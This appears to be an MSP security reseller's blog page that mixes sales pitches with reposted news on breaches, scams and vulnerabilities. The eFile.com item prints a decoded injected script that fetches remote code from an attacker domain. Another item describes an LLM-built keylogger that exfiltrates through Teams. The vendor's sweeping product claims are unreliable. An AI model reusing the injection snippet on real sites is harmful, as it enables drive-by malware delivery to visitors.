Security

Security

Bitdefender Web Categories in GravityZone Content Control

This next KB describes the section Web Categories in GravityZone Content Control:
GravityZone: Security: Network Protection: Operation: Web Categories in GravityZone Content Control
Read Link

(https://www.bitdefender.com/business/support/en/77209-79818-operation.html#UUID-261aadd6-5c24-73b5-d8be-ccc2bf1be88a)

Roy Miehe | MspPortal Partners Inc. | Ceo/President

Security Software Distributor: Bitdefender , Barracuda, Axcient

“Where Service and Technical Skills Count”

Do You Need To Step Up Zero Trust Strategy?

Folks if you are reading this you have to lock down your security products
Quick Outline please do not be lazy and take to heed my comments. Most companies I have seen lately are calling your clients, As I have instructed my own MSP’s/Resellers make up these accounts in the DB, you own them they do not.. but legally if you provide that information to them you grant them access

See 6 new breaches below

RMM

RMM programs are hurting and trying to entice you into one window pane of glass RMM is nothing more the remote management with some reports as to the health of a machine/device that is it even there Remote tools are 3rd party API’s or hooks remote tools should only be Point to Point from a dashboard to the endpoint. The best program is Barracuda ( over 50% or more off SRP through MspPortal Partners Inc) no security breaches like Kaseya and Enable(formally Solarwinds, GFI, LogicNow, Houndog). Kaseya is on a spend Spree and is acquiring firms to add to there portfolio’s churn and burn at your expense. Read the EULA’s all they have to do is apologize and not compensate you a dime for your time to fix.

Every Security company out there has escape clauses WRONG. QUIT Signing contracts We do 3rd line support ourselves.

Mail-Filtering and Backups of O365

O365 is a joke. If you let your client sway you and setup O365 for them you have better protect yourself and your clients.
Barracuda has 3 mail programs Essentials, Complete Mail Protection, Total Mail Protection, MspPortal Partners Inc is a major player Barracuda Arena we offer almost 50% off of SRP if you were to buy direct thru Barracuda that is if a Salesperson contacts you back. We do 3rd line support ourselves.

Malware Detection/Antivirus

Bitdefender is the only product rated # 1. All other firms do extensive marketing with pretty pictures. This is truly a tech dashboard you control the client and the actions. Bitdefender claims (per article they wrote) that MspPortal Partners Inc is there largest provider to MSP’s. We do 3rd line support ourselves.

Hosted Mail
Last we are a partner with ZOHO. We have worked for over 4 months with them fixing there bugs to make it a competitor to O365..Downfall no US support they are based out of India. You need somebody like MspPortal to support you.

If you need pricing contact us, no contracts only month to month we believe if we are doing our job you stay if not you leave no grief. All we expect is you pay your invoices once a month.

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, RackSpace, Axcient
“Where Service and Technical Skills Count”
Phone: 480-275-6900
tech@mspportal.net

Related Articles Breachs:

Food distribution giant Sysco warns of data breach after cyberattack

Cold storage giant Americold outage caused by network breach

Dole discloses employee data breach after ransomware attack

Western Digital says hackers stole customer data in March cyberattack

Hackers leak images to taunt Western Digital’s cyberattack response

T-Mobile discloses second data breach since the start of 2023

Microsoft Patches Serious Azure Cloud Security Flaws

By Elizabeth Montalbano
Three vulnerabilities in the platform’s API Management Service could allow access sensitive data, mount further attacks, and even hijack developer portals.

Microsoft has patched three vulnerabilities in its Azure cloud platform that could have allowed attackers to access sensitive info on a targeted service, deny access to the server, or scan the internal network to mount further attacks, researchers have found.

Researchers from the Ermetic Research Team discovered the flaws in the Azure API Management Service, which allows organizations to create, manage, secure, and monitor APIs across all of their environments, they revealed in a blog post published May 4.

The flaws — all rated high-risk — include two Server-Side Request Forgery (SSRF) vulnerabilities and a file upload path traversal on an internal Azure workload.

SSRF allows an attacker to send a crafted request from a vulnerable server to a targeted external or internal server or service, or even target it in a denial-of-service (DoS) attack. Abusing these flaws means an attacker can access sensitive data stored on the targeted server, overload targeted servers using DoS attacks, and scan the internal network and identify potential targets for further attacks.

The third flaw is one in which Azure does not validate the file type and path of uploaded files. Typically in the case of this type of flaw, authenticated users can traverse the path specified to upload malicious files to the developer portal server and possibly execute code on it using DLL hijacking, IISNode config swapping, or any other similar attack vectors, the researchers said.

Microsoft responded quickly to Ermetic’s disclosure of the flaws and has fully patched them, according to the researchers, and no further action is necessary for Azure customers.
Details on the Bugs

Specifically, the Ermetic researchers discovered two separate SSRF flaws: one that affected the Azure API Management CORS Proxy and another that affected the Azure API Management Hosting Proxy.

They discovered the former on Dec. 21, 2022, and at first believed it was the same flaw that was first reported to Microsoft by another cloud security company on Nov. 12, and fixed a few days later on Nov. 16. However, the researchers later realized that the flaw they found actually bypasses that initial fix. Microsoft ultimately patched the vulnerability fully in January, the initial researchers reported later, according to Ermetic.

Together, the Azure SSRF flaws that researchers discovered affected central servers that “masses of users and organizations depend on for day-to-day operations,” says Liv Matan, cloud security researcher at Ermetic.

“Using them, attackers could fake requests from these legitimate servers, access internal services that may contain sensitive information belonging to Azure customers, and even prevent the availability of the vulnerable servers,” he says.

The path-traversal flaw found in Azure API Management Service allowed for an unrestricted file upload to the Azure developer portal server, the researchers said. The developer portal’s authenticated mode allowed someone to upload static files and images that would be shown on a developer’s dedicated portal, they said.

The flaw could have allowed attackers to take advantage of Microsoft’s self-hosted developer portal as well as weaponize the vulnerability against end users, Matan explains.

“Additionally, the Azure-hosted developer portal contains customer information that would have been at risk if the vulnerability had fallen into the wrong hands,” he says.
How to Protect the Enterprise

While API flaws like the ones Ermetic researchers discovered are uncommon, awareness of these types of vulnerabilities has grown in the past few years, Matan says.

Moreover, “blind SSRFs” — SSRF flaws that do not necessarily return any data but rather focus on performing unauthorized actions on the server’s backend — are fairly common, especially in cloud platforms that offer a wide range of services, he says.

Microsoft already had previously patched four SSRF flaws in four separate services of its Azure cloud platform, two of which could have allowed attackers to perform a server-side request forgery (SSRF) attack — and thus potentially execute remote code execution — even without authentication to a legitimate account.

“In the end, vulnerabilities can be discovered in any cloud platform, at any time,” Matan says.

There’s certainly been evidence of this, as — aside from SSRF flaws — researchers already have found a number of other flaws in Azure as well as other cloud platforms that could have threatened enterprise environments.

In one instance, Microsoft patched what researchers called a “dangerous” flaw in its Azure Service Fabric component that, if exploited, would have allowed an unauthenticated, malicious actor to execute code on a container hosted on the platform.

Because it’s difficult for an enterprise deploying a cloud to have control over or even be aware of a flaw on the underlying cloud-hosting infrastructure, it’s important for organizations to be vigilant in their own security practices so they are prepared if a flaw is eventually discovered or exploited, the researchers said.

In the case of avoiding compromising in the recently discovered Azure API Management, Matan recommends that organizations should practice proper input-validation hygiene and configure their servers to not follow redirects.

“To avoid a compromise in these cases, organizations should validate all input received from untrusted sources, such as user inputs or HTTP requests,” he says.

Other steps organizations can take to avoid compromise in these cases, Matan adds, include using a whitelist approach, implementing a strong firewall to restrict outgoing traffic from the application to only necessary services and ports, isolating data, and managing permissions on the server in cloud environments using IMDSv2.

Link (https://www.darkreading.com/cloud/microsoft-patches-serious-azure-cloud-security-flaws?_mc=NL_DR_EDT_DR_weekly_20230504&cid=NL_DR_EDT_DR_weekly_20230504&sp_aid=116363&elq_cid=34964379&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_cid=48484)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Microsoft 365 outage blocks access to web apps and services

By Sergiu Gatlan April 20, 2023 10:24 AM

My Comments:
Why do you folks put up with Microsoft?? If you want to safe guard your clients information at least use MspPortal/Barracuda product called Total Mail Protection, save it off the Microsoft Network wholesale pricing is very inexpensive but call for pricing

Microsoft is investigating an ongoing outage blocking customers worldwide from accessing and using web apps like Excel Online and online services.

The list of affected services includes Microsoft 365 suite, Exchange Online, SharePoint Online, Yammer Enterprise, Planner, Microsoft Teams, Microsoft 365 for the web, and Project for the web.

According to reports, customers are experiencing problems when trying to sign into their accounts and will see that no web apps are available once in.

“We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center,” the company tweeted earlier today.

“Users may be intermittently unable to view or access web apps in Microsoft 365. We’re reviewing service monitoring telemetry to isolate the root cause and develop a remediation plan,” the admin center incident report says.

In some cases, a banner displayed at the top of the screen asks “new” users to reach out to their IT department to help with the issue.

“New to Microsoft 365? This is your Microsoft 365 home page where you can see and access all of your apps. If it’s empty, it could be that your user license was very recently assigned to you,” the notification reads.

“Wait 10 minutes and refresh this page. If you still don’t see any apps, contact your IT department. They can help you get up and running.”

We’re investigating access issues with Microsoft 365 Online apps and the Teams admin center. Further information can be found under OO544150 within the Microsoft 365 admin center.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

According to the latest updates provided by Microsoft in the admin center, the out was caused by caching infrastructure performing below acceptable performance thresholds and leading to timeout exceptions.

“Analysis of diagnostic data has identified an unusually high number of timeout exceptions within our caching and Azure Active Directory (AAD) infrastructure. We’re working to isolate the cause of these exceptions whilst identifying steps to remediate impact,” Microsoft said.

Until this Microsoft 365 outage is addressed, users can access applications through direct URLs. Microsoft provides the following examples:

Microsoft 365 Admin Center – admin.microsoft.com
Outlook – outlook.office.com
Microsoft Teams – teams.microsoft.com
Word Online – microsoft365.com/launch/word
Excel Online – microsoft365.com/launch/excel

Another outage took down multiple Microsoft 365 services in January after a router IP address change caused packet forwarding issues between routers in Microsoft’s Wide Area Network (WAN).

Services affected by the January 2023 outage included Microsoft Teams, Exchange Online, Outlook, SharePoint Online, OneDrive, the Microsoft 365 Admin Center, Microsoft Graph, Microsoft Intune, and several Microsoft Defender products.

Update April 20, 13:23 EDT: Microsoft is investigating high CPU usage impacting infrastructure processing back-end navigation feature APIs.

Until the outage is resolved, customers can access the Microsoft 365 admin center via http://admin.microsoft.com.

We’re investigating high CPU utilization on the components which process back-end navigation feature APIs. Further details are under MO544165 in the admin center. As the admin center currently does not appear within the Waffle, use https://t.co/EdTvCQNMih to access the service.
— Microsoft 365 Status (@MSFT365Status) April 20, 2023

Link (https://www.bleepingcomputer.com/news/microsoft/microsoft-365-outage-blocks-access-to-web-apps-and-services/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

 

IRS-authorized eFile.com tax return software caught serving JS malware

By Ax Sharma April 4, 2023 05:00 AM

If it was not already bad enough with the Banking issues going on

eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.

Security researchers state the malicious JavaScript file existed on eFile.com website for weeks. BleepingComputer has been able to confirm the existence of the malicious JavaScript file in question, at the time.

Note, this security incident specifically concerns eFile.com and not IRS’ e-file infrastructure or identical sounding domains.
Just in time for tax season

eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called ‘popper.js’:
eFile.com serving malicious popper.js file
The ‘popper.js’ file used by eFile.com across its webpages contains malware
​​​(BleepingComputer)

The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.

The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by infoamanewonliag[.]online:
s=document.createElement(‘script’);
document.body.appendChild(s);
s.src=’//www.infoamanewonliag[.]online/update/index.php?’+Math.random();

The use of Math.random() at the end is likely to prevent caching and load a fresh copy of the malware—should the threat actor make any changes to it, every time eFile.com is visited. At the time of writing, the endpoint was no longer up.

BleepingComputer can confirm, the malicious JavaScript file ‘popper.js’ was being loaded by almost every page of eFile.com, at least up until April 1st.
eFile.com pages serving popper.js
eFile.com pages serving poppers.js (BleepingComputer)

As of today, the file is no longer seen serving the malicious code.
Website ‘hijacked’ over 2 weeks ago

On March 17th, a Reddit thread surfaced where multiple eFile.com users suspected the website was “hijacked.”

At the time, the website showed an SSL error message that, some suspected, was fake and indicative of a hack:

Article (https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

MspPortal Partners Steps up with a Major Purchase

Most everybody know MspPortal Partners supplies security software at wholesale price’s
We now have added Total Email Protection with Barracuda
This allows us to offer 3 different flavors at wholesale pricing.
1) Advanced Email Protection-
Combine email gateway and artificial intelligence to block threats Ensure protection against all 13 email threat types. Automatically remediate post-delivery email threats.

2) Complete Mail Protection-
Includes everything from Advanced. Backs up all O365 and Gsuite components off the O365 and Gsuite Servers

3) Total Mail Protection-
Includes everything from Premium. Protect and restore your Microsoft 365 data. Protect your Microsoft 365 applications from lateral attacks. Plus Phisline-Sentinal

You will be provided as normal up to 3rd level support which puts MspPortal Partners on top of the distributors in the Security Software Arena.
We have 24x7x365 support
Working hours are M-F 7:30am- 5pm MST/Arizona
Coming soon this month will be bundle pricing Mail Filtering (Barracuda), RMM (Barracuda), Antivirus/Antimalware (Bitdefender) this will ensure all Partners and there Customers are protected at all times.

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Cybercriminals exploit SVB collapse to steal money and data

By Bill Toulas March 14, 2023 11:55 AM

My thoughts using Barracuda Complte Mail Protection in front of O365 or G-suite is very in expensive compared to your complet network or computers being taking down with malware.

 
The collapse of the Silicon Valley Bank (SVB) on March 10, 2023, has sent ripples of turbulence throughout the global financial system, but for hackers, scammers, and phishing campaigns, it’s becoming an excellent opportunity.

As multiple security researchers report, threat actors are already registering suspicious domains, conducting phishing pages, and gearing up for business email compromise (BEC) attacks.

These campaigns aim to steal money, steal account data, or infect targets with malware.
SVB going defunct

SVB was a U.S.-based commercial bank, the 16th largest in the country, and the largest bank by deposits in Silicon Valley, California.

On March 10, 2023, the bank failed after a run on its deposits. This failure was the largest of any bank since the 2007-2008 financial crisis and the second-largest in U.S. history.

This event has impacted many businesses and people in the technology, life science, healthcare, private equity, venture capital, and premium wine industries who were customers of SVB.

The chaotic situation is further worsened by the prevailing elements of urgency, uncertainty, and the significant amounts of money deposited at the bank.
Scammers jump at the opportunity

 

Security researcher Johannes Ulrich reported yesterday that threat actors are jumping at the opportunity, registering suspicious domains related to SVB that are very likely to be used in attacks.

Some of the examples given in a report published on the SANS ISC website include:

login-svb[.]com
svbbailout[.]com
svbcertificates[.]com
svbclaim[.]com
svbcollapse[.]com
svbdeposits[.]com
svbhelp[.]com
svblawsuit[.]com

Ulrich warned that the scammers might attempt to contact former clients of SVB to offer them a support package, legal services, loans, or other fake services relating to the bank’s collapse.

An attack already seen in the wild is from BEC threat actors who are impersonating SVB customers and telling customers that they need payments sent to a new bank account after the bank’s collapse.

However, these bank accounts belong to the threat actors, who steal payments meant to go to the legitimate company.

Cyber-intelligence firm Cyble published a similar report today exploring developing SVB-themed threats, warning about these additional domains:

svbdebt[.]com
svbclaims[.]net
svb-usdc[.]com
svb-usdc[.]net
svbi[.]io
banksvb[.]com
svbank[.]com
svblogin[.]com

Many of these sites were registered on the day of the bank’s collapse, March 10, 2023, and are already hosting cryptocurrency scams.

These scam pages tell SVB customers that the bank is distributing USDC as part of a “payback” program.

“March 13 2023 – Silicon Valley Bank is actively distributing USDC as part of the SVB USDC payback program to eligible USDC holders. USDC payouts can only be claimed once per wallet,” claims the cryptocurrency scam.

However, clicking on the site’s ‘Click here to claim’ button brings up a QR code that attempts to compromise Metamask, Exodus, and the Trust Wallet crypto wallets when scanned.

Article (https://www.bleepingcomputer.com/news/security/cybercriminals-exploit-svb-collapse-to-steal-money-and-data/)
Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

Microsoft: Business email compromise attacks can take just hours

Does this surprise you???
By Bill Toulas March 9, 2023

Microsoft’s Security Intelligence team recently investigated a business email compromise (BEC) attack and found that attackers move rapidly, with some steps taking mere minutes.

The whole process, from signing in using compromised credentials to registering typosquatting domains and hijacking an email thread, took the threat actors only a couple of hours.

This rapid attack progression ensures that the targets will have minimal opportunity to identify signs of fraud and take preventive measures.

A multi-billion problem

BEC attacks are a type of cyberattack where the attacker gains access to an email account of the target organization through phishing, social engineering, or buying account credentials on the dark web.

The attacker then impersonates a trusted individual, such as a senior executive or a supplier, to trick an employee working in the financial department into approving a fraudulent wire transfer request.

According to FBI data, from June 2016 until July 2019, BEC attacks resulted in losses amounting to over $43 billion, and this concerns only the cases reported to the law enforcement agency.

In a Twitter thread, Microsoft’s analysts explain that a recently investigated BEC attack began with the threat actor performing an “adversary-in-the-middle” (AiTM) phishing attack to steal the target’s session cookie, bypassing MFA protection.

The attacker logged in to the victim’s account on January 5, 2023, and spent two hours searching the mailbox for good email threads to hijack.

Thread hijacking is a very effective technique making it appear that the fraudulent message is a continuation of an existing communication exchange, so the recipients are far more likely to trust it.

After that, the attacker registered deceptive domains using homoglyph characters to make them appear almost identical to the sites of the target organization and the impersonated partner.

Five minutes later, the attacker created an inbox rule to siphon emails from the partner organization to a specific folder.

In the next minute, the attacker sent the malicious email to the business partner asking for a wire transfer instruction change and immediately deleted the sent message to reduce the likelihood of the compromised user discovering the breach.

From the first sign-in to the deletion of the sent email, a total of 127 minutes had passed, reflecting a rush from the attacker’s side.

Microsoft 365 Defender generated a warning about BEC financial fraud 20 minutes after the threat actor deleted the sent email and automatically disrupted the attack by disabling the user’s account.
Progression of the attack blocked by Microsoft
Progression of the attack blocked by MS 365 Defender (Microsoft)

“In our testing and evaluation of BEC detections and actions in customer environments faced with real-world attack scenarios, dozens of organizations were better protected when accounts were automatically disabled by Microsoft 365 Defender,” claims Microsoft.

“The new automatic disruption capabilities leave the SOC team in full control to investigate all actions taken by Microsoft 365 Defender and where needed, heal any remaining, affected assets.”

Microsoft says its security product has disrupted 38 BEC attacks targeting 27 organizations using high-confidence eXtended Detection and Response (XDR) signals across endpoints, identities, email, and SaaS apps.

Article (https://www.bleepingcomputer.com/news/security/microsoft-business-email-compromise-attacks-can-take-just-hours/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

What GoDaddy’s Years-Long Breach Means for Millions of Clients

Drop Go Daddy !!

 

The same “sophisticated” threat actor has pummeled the domain host on an ongoing basis since 2020, making off with customer logins, source code, and more. Here’s what to do.

Nate Nelson
Contributing Writer, Dark Reading

For years, the domain registrar and Web hosting company GoDaddy has experienced a cyber barrage of extraordinary scale, it has confirmed — affecting both the company and its many individual and enterprise clients.

As described in its 10K filing for 2022, released Feb. 16, the company has been breached once every year since 2020 by the same set of cyberattackers, with the latest occurring just last December. It’s worth also mentioning that the company has been the subject of earlier cyber incursions as well. The consequences to GoDaddy are one thing, but, more notably, the breaches have led to data compromises for more than 1 million of the company’s users.

That may well be the key to why the bad guys keep coming back. Because of the nature of its business, GoDaddy is a connecting link to millions of businesses around the world. As Brad Hong, customer success lead at Horizon3ai puts it: “This is the equivalent of your landlord’s office being left unlocked, giving a bad actor access to the keys to your house.”
GoDaddy’s Three-Headed Breach

While the world was coming to grips with COVID-19, thousands of GoDaddy customers had a second problem on their hands. In March 2020, the company discovered that an attacker had compromised the login details for a small number of their employees, as well as 28,000 of their hosting customers.

It was a harbinger of worse things to come.

In November 2021, a threat actor got their hands on a password that allowed them access to Managed WordPress, GoDaddy’s hosting platform for building and managing WordPress sites. This case touched 1.2 million Managed WordPress customers.

There was yet more. In a statement published alongside its 10K, GoDaddy shared details of yet a third compromise.

“In early December 2022, we started receiving a small number of customer complaints about their websites being intermittently redirected,” the company said. It turned out that an attacker had breached and planted malware on the company’s hosting servers for cPanel, a control panel program for Web hosts. This malware intermittently redirected users from the websites they intended to visit, to malicious sites.

In their statement, the company claimed to “have evidence, and law enforcement has confirmed, that this incident was carried out by a sophisticated and organized group targeting hosting services like GoDaddy. According to information we have received, their apparent goal is to infect websites and servers with malware for phishing campaigns, malware distribution, and other malicious activities.”
The Supply Chain Problem With Hosting Services

According to Domain Name Stat, GoDaddy is far and away the largest domain name registrar on the Internet, capturing more than 12% market share with its nearly 80 million registered domains. Scale, alone, would make it an attractive target for cyberattacks, but being a hosting service makes this a whole other animal.

“GoDaddy and other Web hosting sites are prime targets for adversaries looking to conduct supply chain attacks,” says Allie Roblee, intelligence analyst at Resilience. A company may take care to implement strong security practices and software, shunting phishing attacks, and patching up software bugs, yet still be vulnerable through a trusted provider like their Web hosting service. “Breaching large service providers like GoDaddy allows adversaries to compromise organizations and individuals they may have been unable to get into directly.”

Of course, once attackers get in through the side entrance, they can do anything from stealing credentials to dropping malware, redirecting users to malicious sites, planting backdoors for later use, and much more. But “the implications for these compromises go even beyond that of security,” Hong warns.

Consider an innocent person who intends to visit a business’s website, but instead ends up redirected to a malicious site. Would that person ever risk visiting that business’ website again? This, Hong points out, “hurts the reputation and operations of thousands, if not millions, of legitimate businesses.”

Beyond that, there’s a broader cost. “Weak security at this vendor level additionally allows attackers to force multiply their ability to carry out whatever objective they wish to,” he explains. Such compromises “not only provide them with rich PII and private key data intelligence, but also an extensive network of websites and servers to do their bidding — similar to an IoT botnet, but instead of multiplying traffic, it multiplies the chances of successfully carrying out attacks which rely on humans as a weakness.”
What GoDaddy Customers Can Do

If it didn’t end that first or second time, how likely is it that the campaign against GoDaddy is over now? “It’s possible,” Roblee warns, “that the attackers still have access to GoDaddy’s infrastructure or have the capability to find vulnerabilities in the stolen source code they can exploit to regain access.”

For that reason, she says, “customers should audit any recently changed or uploaded files on their website to ensure that malware has not been installed. Additionally, I would recommend checking historical DNS records to see if any of their domains had been temporarily redirected.”

Hong’s advice is even simpler. “Affected businesses should change everything!” including all potentially affected login credentials, “and especially deprecating and creating fresh SSL private keys if using them.”

Preventative measures will be more necessary going forward than ever before. As GoDaddy assessed in their 10K, the risk of attack “is likely to increase as we expand the number of cloud-based products we offer and operate in more countries.”

GoDaddy declined to comment for this article beyond its published statement when contacted by Dark Reading.

Article (https://www.darkreading.com/risk/what-godaddy-years-long-breach-means-millions-clients?_mc=NL_DR_EDT_DR_weekly_20230309&cid=NL_DR_EDT_DR_weekly_20230309&sp_aid=115492&elq_cid=34964379&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_cid=47879)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”

 

AI-Powered ‘BlackMamba’ Keylogging Attack Evades Modern EDR Security Must Read

Researchers warn that polymorphic malware created with ChatGPT and other LLMs will force a reinvention of security automation.

Elizabeth Montalbano
Contributor, Dark Reading

A proof-of-concept, artificial intelligence (AI)-driven cyberattack that changes its code on the fly can slip past the latest automated security-detection technology, demonstrating the potential for creating undetectable malware.

Researchers from HYAS Labs demonstrated the proof-of-concept attack, which they call BlackMamba, which exploits a large language model (LLM) — the technology on which ChatGPT is based — to synthesize a polymorphic keylogger functionality on the fly. The attack is “truly polymorphic” in that every time BlackMamba executes, it resynthesizes its keylogging capability, the researchers wrote.

The BlackMamba attack, outlined in a blog post, demonstrates how AI can allow the malware to dynamically modify benign code at runtime without any command-and-control (C2) infrastructure, allowing it to slip past current automated security systems that are attuned to look out for this type of behavior to detect attacks.

“Traditional security solutions like endpoint detection and response (EDR) leverage multi-layer, data intelligence systems to combat some of today’s most sophisticated threats, and most automated controls claim to prevent novel or irregular behavior patterns,” the HYAS Labs researchers wrote. “But in practice, this is very rarely the case.”

They tested the attack against an EDR system that was not identified specifically, but characterized as “industry leading,” often resulting in zero alerts or detections.

Using its built-in keylogging ability, BlackMamba can collect sensitive information from a device, including usernames, passwords, and credit card numbers, the researchers said. Once this data is captured, the malware uses a common and trusted collaboration platform — Microsoft Teams — to send the collected data to a malicious Teams channel. From there, attackers can exploit the data in various nefarious ways, selling it on the Dark Web or using it for further attacks, the HYAS Labs researchers said.

“MS Teams is a legitimate communication and collaboration tool that is widely used by organizations, so malware authors can leverage it to bypass traditional security defenses, such as firewalls and intrusion detection systems,” they wrote. “Also, since the data is sent over encrypted channels, it can be difficult to detect that the channel is being used for exfiltration.”

Moreover, because BlackMamba’s delivery system is based on an open source Python package, it allows developers to convert Python scripts into standalone executable files that can be run on various platforms, including Windows, macOS, and Linux, they wrote.
What This Means for Modern Security

AI-powered attacks like this will become more common now as threat actors create polymorphic malware that leverages ChatGPT and other sophisticated, data-intelligence systems based on LLM, according to the HYAS Labs researchers. This, in turn, will force automated security technology to evolve as well to manage and combat these threats.

“The threats posed by this new breed of malware are very real,” the researchers wrote in the post. “By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions.”

Typically, organizations that deploy EDR and other automated security controls as part of a modern security stack believe they’re doing everything in their power to detect and prevent malicious activity. However, BlackMamba’s use of AI now demonstrates that “they are not foolproof,” the HYAS Labs researchers noted.

“The BlackMamba proof-of-concept shows that LLMs can be exploited to synthesize polymorphic keylogger functionality on-the-fly, making it difficult for EDR to intervene,” they wrote.

The security landscape will have to evolve alongside attackers’ use of AI to keep up with the more sophisticated attacks that are on the horizon, according to the researchers. Until then, it’s imperative that organizations “remain vigilant, keep their security measures up to date,” they advised, “and adapt to new threats that emerge by operationalizing cutting-edge research being conducted in this space.”

Article (https://www.darkreading.com/endpoint/ai-blackmamba-keylogging-edr-security?_mc=NL_DR_EDT_DR_weekly_20230309&cid=NL_DR_EDT_DR_weekly_20230309&sp_aid=115492&elq_cid=34964379&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_eh=949bacdba1e2c4851acc11df0ff47140b1c6468716621bc723fe5fe498198bd9&sp_cid=47879)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”